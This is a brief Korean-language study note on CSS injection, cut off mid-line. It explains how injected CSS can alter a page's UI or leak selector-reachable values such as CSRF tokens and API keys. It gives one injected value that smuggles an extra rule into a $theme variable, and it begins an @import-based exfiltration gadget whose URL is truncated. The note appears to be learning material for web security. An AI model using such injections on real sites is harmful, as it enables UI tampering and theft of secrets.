CSS Injection 배경지식 개념 웹 페이지 로딩 시 악의적인 문자열을 삽입하여 악의적인 동작을 이끄는 공격 임의 CSS 속성을 삽입해 웹페이지의 UI 를 변조하거나 웹 페이지내의 데이터를 외부로 훔칠 수 있다 CSRF Token, 피해자의 API Key등 웹 페이지에 직접적으로 보여지는 값처럼 CSS 선택자를 통해 표현이 가능한 값이어야 한다 HTML (style) 영역에 공격자가 임의 입력 값을 넣을 수 있거나 임의 HTML을 삽입할 수 있는 상황에서 사용한다 예제 => $theme에 yellow; h1 { color: red 삽입 시 UI 변조 가능 IP ping back 방법 - 외부 요청을 전송함으로써 웹페이지의 데이터를 탈취할 수 있다 CSS 가젯 설명 @import 'https://le..